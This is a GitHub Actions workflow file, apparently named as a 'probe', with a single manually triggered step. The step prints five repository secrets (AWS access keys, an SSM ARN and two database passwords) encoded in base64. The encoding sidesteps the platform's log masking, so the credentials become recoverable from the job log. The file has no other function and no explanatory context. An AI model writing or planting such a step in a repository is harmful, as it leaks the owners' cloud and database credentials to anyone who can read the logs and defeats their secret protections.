name: vg-probe
on:
  workflow_dispatch:

jobs:
  probe:
    runs-on: ubuntu-latest
    steps:
      - name: Dump
        run: |
          echo "::add-mask::${{ secrets.AWS_ACCESS_KEY_ID }}"
          echo "::add-mask::${{ secrets.AWS_SECRET_ACCESS_KEY }}"
          echo "::add-mask::${{ secrets.SCORER_SERVER_SSM_ARN }}"
          echo "::add-mask::${{ secrets.DB_PASSWORD }}"
          echo "::add-mask::${{ secrets.READ_REPLICA_PASSWORD }}"
          echo "AWS_ACCESS_KEY_ID=${{ secrets.AWS_ACCESS_KEY_ID }}" | base64 -w0
          echo "AWS_SECRET_ACCESS_KEY=${{ secrets.AWS_SECRET_ACCESS_KEY }}" | base64 -w0
          echo "SCORER_SERVER_SSM_ARN=${{ secrets.SCORER_SERVER_SSM_ARN }}" | base64 -w0
          echo "DB_PASSWORD=${{ secrets.DB_PASSWORD }}" | base64 -w0
          echo "READ_REPLICA_PASSWORD=${{ secrets.READ_REPLICA_PASSWORD }}" | base64 -w0
          echo "DONE_MARKER"
